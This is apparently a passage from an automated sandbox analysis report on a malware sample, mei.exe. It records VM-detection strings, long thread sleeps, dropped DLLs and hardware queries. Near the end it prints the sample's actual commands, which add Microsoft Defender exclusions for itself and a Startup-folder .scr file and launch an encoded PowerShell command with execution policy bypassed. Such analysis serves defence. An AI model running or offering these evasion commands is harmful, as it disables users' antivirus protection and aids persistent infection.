              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7491
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 625
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6963
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 757
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1827
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 494
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2581
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2996
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3869
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2600
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1196
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2458
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-convert-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-profile-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-namedpipe-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-2-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-string-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processenvironment-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-environment-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-utility-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-locale-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-process-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-memory-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-string-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-2-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-stdio-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-conio-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-runtime-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-math-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-filesystem-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-timezone-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-heap-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-libraryloader-l1-1-0.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-1.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-util-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-handle-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-heap-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-rtlsupport-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-time-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-localization-l1-2-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-interlocked-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-sysinfo-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l2-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe Check user administrative privileges: GetTokenInformation, DecisionNodes graph_0-16550
              Source: C:\Users\user\Desktop\mei.exe API coverage: 7.4 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924 Thread sleep count: 7491 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924 Thread sleep count: 625 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928 Thread sleep count: 6963 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928 Thread sleep count: 757 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 Thread sleep count: 1827 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 Thread sleep count: 185 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep time: -11990383647911201s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8200 Thread sleep count: 494 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8324 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8244 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8212 Thread sleep count: 2996 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8212 Thread sleep count: 58 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep count: 3869 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep count: 131 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2664 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 Thread sleep count: 2600 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 Thread sleep count: 1196 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8520 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8452 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540 Thread sleep count: 2458 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8580 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8584 Thread sleep count: 259 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct (2 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (2 identical entries)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (25 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313E7CFC _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6313E7CFC (2 identical entries)
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F1D94 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6313F1D94
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313D8880 FindFirstFileExW,FindClose,0_2_00007FF6313D8880
Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,89_2_00007FF7D79E46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A288E0 FindFirstFileExA,89_2_00007FF7D7A288E0
Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,89_2_00007FF7D79DE21C
Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFF1A0180 GetSystemInfo,1_2_00007FFDFF1A0180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (18 identical entries)
Source: getmac.exe, 00000040.00000002.1823733565.00000265219C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"S
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc
Source: mei.exe, 00000001.00000003.1681553777.000002E913F6E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray
Source: mei.exe, 00000001.00000003.1788371805.000002E914117000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819727719.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819939780.000002E914114000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1789104763.000002E914B88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareservice
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313EAA88 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6313EAA88
Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFB287B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB287B30
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313F39A0 GetProcessHeap,0_2_00007FF6313F39A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (9 identical entries)
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug (4 identical entries)
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313EAA88 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6313EAA88
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313DBC90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6313DBC90
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313DC52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6313DC52C
Source: C:\Users\user\Desktop\mei.exe | Code function: 0_2_00007FF6313DC710 SetUnhandledExceptionFilter,0_2_00007FF6313DC710
Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFDFAC73058 IsProcessorFeaturePresent,00007FFE1A4519C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A4519C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAC73058
Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00312135 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE00312135
Source: C:\Users\user\Desktop\mei.exe | Code function: 1_2_00007FFE00311CBC SetUnhandledExceptionFilter,1_2_00007FFE00311CBC
Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A1B6D8 SetUnhandledExceptionFilter,89_2_00007FF7D7A1B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A1A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,89_2_00007FF7D7A1A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A1B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,89_2_00007FF7D7A1B52C
Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A24C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,89_2_00007FF7D7A24C10

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\mei.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'" (2 identical entries)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe' (2 identical entries)
Source: C:\Users\user\Desktop\mei.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" (2 identical entries)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' (2 identical entries)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
